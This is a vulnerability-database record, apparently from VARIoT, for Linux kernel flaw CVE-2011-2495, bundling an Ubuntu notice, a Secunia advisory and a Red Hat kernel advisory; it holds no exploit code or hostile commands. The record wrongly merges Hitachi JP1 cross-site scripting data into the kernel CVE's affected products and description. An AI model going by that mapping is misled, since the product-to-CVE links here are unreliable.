Vasiliy Kulikov discovered that /proc/PID/io did not enforce access restrictions. A local attacker could exploit this to read certain information, leading to a loss of privacy. (CVE-2011-2495)

It was discovered that the wireless stack incorrectly verified SSID lengths. (CVE-2011-2517)

It was discovered that the EXT4 filesystem contained multiple off-by-one flaws. (CVE-2011-2695)

Christian Ohm discovered that the perf command looks for configuration files in the current directory. If a privileged user were tricked into running perf in a directory containing a malicious configuration file, an attacker could run arbitrary commands and possibly gain privileges. (CVE-2011-2905)

Vasiliy Kulikov discovered that the Comedi driver did not correctly clear memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2011-2909)

Yogesh Sharma discovered that CIFS did not correctly handle UNCs that had no prefixpaths. (CVE-2011-3363)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 10.10: linux-image-2.6.35-903-omap4 2.6.35-903.26

After a standard system update you need to reboot your computer to make all the necessary changes

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201206-0279",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.39.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.39.2"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.39.3"
      },
      {
        "model": "jp1/it service level management manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "-09-50"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-50"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-11-02"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-11"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-10-03"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-10"
      },
      {
        "model": "jp1/it service level management-manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-51"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-50-02"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-11-05"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-548"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2495"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.39:rc6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.39:rc5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2.6.39.3",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.39:rc4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.39:rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.39:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.39:rc7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.39.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.39.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.39:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.39:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-2495"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Hitachi",
    "sources": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2011-2495",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "CVE-2011-2495",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2011-2495",
            "trust": 1.0,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201108-548",
            "trust": 0.6,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-548"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2495"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "fs/proc/base.c in the Linux kernel before 2.6.39.4 does not properly restrict access to /proc/#####/io files, which allows local users to obtain sensitive I/O statistics by polling a file, as demonstrated by discovering the length of another user\u0027s password. Hitachi JP1 products are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. \nThe following products are affected:\nJP1/IT Resource Management - Manager\nJP1/IT Service Level Management - Manager. ----------------------------------------------------------------------\n\nSecunia is hiring!\n\nFind your next job here:\n\nhttp://secunia.com/company/jobs/\n\n----------------------------------------------------------------------\n\nTITLE:\nHitachi JP1/IT Service Level Management Unspecified Cross-Site\nScripting Vulnerability\n\nSECUNIA ADVISORY ID:\nSA47804\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/47804/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47804\n\nRELEASE DATE:\n2012-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/47804/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/47804/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47804\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Hitachi JP1/IT Service Level\nManagement, which can be exploited by malicious people to conduct\ncross-site scripting attacks. \n\nCertain unspecified input is not properly sanitised before being\nreturned to the user. \n\nThe vulnerability is reported in version 09-50. \n\nPROVIDED AND/OR DISCOVERED BY:\nReported by the vendor. \n\nORIGINAL ADVISORY:\nHitachi (English):\nhttp://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS12-005/index.html\n\nHitachi (Japanese):\nhttp://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS12-005/index.html\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2011:1189-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2011-1189.html\nIssue date:        2011-08-23\nCVE Names:         CVE-2011-1182 CVE-2011-1576 CVE-2011-1593 \n                   CVE-2011-1776 CVE-2011-1898 CVE-2011-2183 \n                   CVE-2011-2213 CVE-2011-2491 CVE-2011-2492 \n                   CVE-2011-2495 CVE-2011-2497 CVE-2011-2517 \n                   CVE-2011-2689 CVE-2011-2695 \n=====================================================================\n\n1. Summary:\n\nUpdated kernel packages that fix several security issues, various bugs, and\nadd two enhancements are now available for Red Hat Enterprise Linux 6. \n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64\n\n3. Description:\n\nSecurity issues:\n\n* Using PCI passthrough without interrupt remapping support allowed KVM\nguests to generate MSI interrupts and thus potentially inject traps. A\nprivileged guest user could use this flaw to crash the host or possibly\nescalate their privileges on the host. The fix for this issue can prevent\nPCI passthrough working and guests starting. Refer to Red Hat Bugzilla bug\n715555 for details. (CVE-2011-1898, Important)\n\n* Flaw in the client-side NLM implementation could allow a local,\nunprivileged user to cause a denial of service. (CVE-2011-2491, Important)\n\n* Integer underflow in the Bluetooth implementation could allow a remote\nattacker to cause a denial of service or escalate their privileges by\nsending a specially-crafted request to a target system via Bluetooth. \n(CVE-2011-2497, Important)\n\n* Buffer overflows in the netlink-based wireless configuration interface\nimplementation could allow a local user, who has the CAP_NET_ADMIN\ncapability, to cause a denial of service or escalate their privileges on\nsystems that have an active wireless interface. (CVE-2011-2517, Important)\n\n* Flaw in the way the maximum file offset was handled for ext4 file systems\ncould allow a local, unprivileged user to cause a denial of service. \n(CVE-2011-2695, Important)\n\n* Flaw allowed napi_reuse_skb() to be called on VLAN packets. An attacker\non the local network could use this flaw to send crafted packets to a\ntarget, possibly causing a denial of service. (CVE-2011-1576, Moderate)\n\n* Integer signedness error in next_pidmap() could allow a local,\nunprivileged user to cause a denial of service. (CVE-2011-1593, Moderate)\n\n* Race condition in the memory merging support (KSM) could allow a local,\nunprivileged user to cause a denial of service. KSM is off by default, but\non systems running VDSM, or on KVM hosts, it is likely turned on by the\nksm/ksmtuned services. (CVE-2011-2183, Moderate)\n\n* Flaw in inet_diag_bc_audit() could allow a local, unprivileged user to\ncause a denial of service. (CVE-2011-2213, Moderate)\n\n* Flaw in the way space was allocated in the Global File System 2 (GFS2)\nimplementation. If the file system was almost full, and a local,\nunprivileged user made an fallocate() request, it could result in a denial\nof service. Setting quotas to prevent users from using all available disk\nspace would prevent exploitation of this flaw. (CVE-2011-2689, Moderate)\n\n* Local, unprivileged users could send signals via the sigqueueinfo system\ncall, with si_code set to SI_TKILL and with spoofed process and user IDs,\nto other processes. This flaw does not allow existing permission checks to\nbe bypassed; signals can only be sent if your privileges allow you to\nalready do so. (CVE-2011-1182, Low)\n\n* Heap overflow in the EFI GUID Partition Table (GPT) implementation could\nallow a local attacker to cause a denial of service by mounting a disk\ncontaining crafted partition tables. (CVE-2011-1776, Low)\n\n* Structure padding in two structures in the Bluetooth implementation was\nnot initialized properly before being copied to user-space, possibly\nallowing local, unprivileged users to leak kernel stack memory to\nuser-space. (CVE-2011-2492, Low)\n\n* /proc/[PID]/io is world-readable by default. Previously, these files\ncould be read without any further restrictions. A local, unprivileged user\ncould read these files, belonging to other, possibly privileged processes\nto gather confidential information, such as the length of a password used\nin a process. (CVE-2011-2495, Low)\n\nRed Hat would like to thank Vasily Averin for reporting CVE-2011-2491; Dan\nRosenberg for reporting CVE-2011-2497 and CVE-2011-2213; Ryan Sweat for\nreporting CVE-2011-1576; Robert Swiecki for reporting CVE-2011-1593; Andrea\nRighi for reporting CVE-2011-2183; Julien Tinnes of the Google Security\nTeam for reporting CVE-2011-1182; Timo Warns for reporting CVE-2011-1776;\nMarek Kroemeke and Filip Palian for reporting CVE-2011-2492; and Vasiliy\nKulikov of Openwall for reporting CVE-2011-2495. \n\n4. Solution:\n\nRefer to the Technical Notes, available shortly from the link in the\nReferences, for bug fix and enhancement details. \n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues, and fix the bugs and add\nthe enhancements noted in the Technical Notes. The system must be\nrebooted for this update to take effect. \n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/kb/docs/DOC-11259\n\nTo install kernel packages manually, use \"rpm -ivh [package]\". Do not\nuse \"rpm -Uvh\" as that will remove the running kernel binaries from\nyour system. You may use \"rpm -e\" to remove old kernels after\ndetermining that the new kernel functions properly on your system. \n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n690028 - CVE-2011-1182 kernel signal spoofing issue\n695173 - CVE-2011-1576 kernel: net: Fix memory leak/corruption on VLAN GRO_DROP\n697822 - CVE-2011-1593 kernel: proc: signedness issue in next_pidmap()\n703019 - CVE-2011-2492 kernel: bluetooth: l2cap and rfcomm: fix 1 byte infoleak to userspace\n703026 - CVE-2011-1776 kernel: validate size of EFI GUID partition entries\n709393 - CVE-2011-2491 kernel: rpc task leak after flock()ing  NFS share\n710338 - CVE-2011-2183 kernel: ksm: race between ksmd and exiting task\n713827 - Parallel port issue in RHEL 6.0 server\n714536 - CVE-2011-2213 kernel: inet_diag: insufficient validation\n714982 - GFS2: Update to rhel6.1 broke dovecot writing to a gfs2 filesystem\n715555 - CVE-2011-1898 virt: VT-d (PCI passthrough) MSI trap injection\n716539 - bump domain memory limits [6.1.z]\n716805 - CVE-2011-2497 kernel: bluetooth: buffer overflow in l2cap config request\n716825 - CVE-2011-2495 kernel: /proc/PID/io infoleak\n718152 - CVE-2011-2517 kernel: nl80211: missing check for valid SSID size in scan operations\n720861 - CVE-2011-2689 kernel: gfs2: make sure fallocate bytes is a multiple of blksize\n722557 - CVE-2011-2695 kernel: ext4: kernel panic when writing data to the last block of sparse file\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kernel-2.6.32-131.12.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-131.12.1.el6.i686.rpm\nkernel-debug-2.6.32-131.12.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-131.12.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-131.12.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-131.12.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-131.12.1.el6.i686.rpm\nkernel-devel-2.6.32-131.12.1.el6.i686.rpm\nkernel-headers-2.6.32-131.12.1.el6.i686.rpm\nperf-2.6.32-131.12.1.el6.i686.rpm\nperf-debuginfo-2.6.32-131.12.1.el6.i686.rpm\n\nnoarch:\nkernel-doc-2.6.32-131.12.1.el6.noarch.rpm\nkernel-firmware-2.6.32-131.12.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debug-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-devel-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-headers-2.6.32-131.12.1.el6.x86_64.rpm\nperf-2.6.32-131.12.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/kernel-2.6.32-131.12.1.el6.src.rpm\n\nnoarch:\nkernel-doc-2.6.32-131.12.1.el6.noarch.rpm\nkernel-firmware-2.6.32-131.12.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debug-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-devel-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-headers-2.6.32-131.12.1.el6.x86_64.rpm\nperf-2.6.32-131.12.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/kernel-2.6.32-131.12.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-131.12.1.el6.i686.rpm\nkernel-debug-2.6.32-131.12.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-131.12.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-131.12.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-131.12.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-131.12.1.el6.i686.rpm\nkernel-devel-2.6.32-131.12.1.el6.i686.rpm\nkernel-headers-2.6.32-131.12.1.el6.i686.rpm\nperf-2.6.32-131.12.1.el6.i686.rpm\nperf-debuginfo-2.6.32-131.12.1.el6.i686.rpm\n\nnoarch:\nkernel-doc-2.6.32-131.12.1.el6.noarch.rpm\nkernel-firmware-2.6.32-131.12.1.el6.noarch.rpm\n\nppc64:\nkernel-2.6.32-131.12.1.el6.ppc64.rpm\nkernel-bootwrapper-2.6.32-131.12.1.el6.ppc64.rpm\nkernel-debug-2.6.32-131.12.1.el6.ppc64.rpm\nkernel-debug-debuginfo-2.6.32-131.12.1.el6.ppc64.rpm\nkernel-debug-devel-2.6.32-131.12.1.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-131.12.1.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-131.12.1.el6.ppc64.rpm\nkernel-devel-2.6.32-131.12.1.el6.ppc64.rpm\nkernel-headers-2.6.32-131.12.1.el6.ppc64.rpm\nperf-2.6.32-131.12.1.el6.ppc64.rpm\nperf-debuginfo-2.6.32-131.12.1.el6.ppc64.rpm\n\ns390x:\nkernel-2.6.32-131.12.1.el6.s390x.rpm\nkernel-debug-2.6.32-131.12.1.el6.s390x.rpm\nkernel-debug-debuginfo-2.6.32-131.12.1.el6.s390x.rpm\nkernel-debug-devel-2.6.32-131.12.1.el6.s390x.rpm\nkernel-debuginfo-2.6.32-131.12.1.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-131.12.1.el6.s390x.rpm\nkernel-devel-2.6.32-131.12.1.el6.s390x.rpm\nkernel-headers-2.6.32-131.12.1.el6.s390x.rpm\nkernel-kdump-2.6.32-131.12.1.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-131.12.1.el6.s390x.rpm\nkernel-kdump-devel-2.6.32-131.12.1.el6.s390x.rpm\nperf-2.6.32-131.12.1.el6.s390x.rpm\nperf-debuginfo-2.6.32-131.12.1.el6.s390x.rpm\n\nx86_64:\nkernel-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debug-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-devel-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-headers-2.6.32-131.12.1.el6.x86_64.rpm\nperf-2.6.32-131.12.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/kernel-2.6.32-131.12.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-131.12.1.el6.i686.rpm\nkernel-debug-2.6.32-131.12.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-131.12.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-131.12.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-131.12.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-131.12.1.el6.i686.rpm\nkernel-devel-2.6.32-131.12.1.el6.i686.rpm\nkernel-headers-2.6.32-131.12.1.el6.i686.rpm\nperf-2.6.32-131.12.1.el6.i686.rpm\nperf-debuginfo-2.6.32-131.12.1.el6.i686.rpm\n\nnoarch:\nkernel-doc-2.6.32-131.12.1.el6.noarch.rpm\nkernel-firmware-2.6.32-131.12.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debug-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-devel-2.6.32-131.12.1.el6.x86_64.rpm\nkernel-headers-2.6.32-131.12.1.el6.x86_64.rpm\nperf-2.6.32-131.12.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-131.12.1.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and \ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2011-1182.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-1576.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-1593.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-1776.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-1898.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2183.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2213.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2491.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2492.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2495.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2497.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2517.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2689.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2695.html\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/6/html/6.1_Technical_Notes/kernel.html#RHSA-2011-1189\nhttps://bugzilla.redhat.com/show_bug.cgi?id=715555\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e.  More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2011 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFOU72NXlSAg2UNWIIRAvuvAJ0XW+pjVB73eYV6dyMHJAKRZqTyygCeIAtM\n+72YbSFubpSk5fCdBrnH5XY=\n=wVAB\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nThese packages contain the Linux kernel. (CVE-2011-2482,\nImportant)\n\nIf you do not run applications that use SCTP, you can prevent the sctp\nmodule from being loaded by adding the following to the end of the\n\"/etc/modprobe.d/blacklist.conf\" file:\n\nblacklist sctp\n\nThis way, the sctp module cannot be 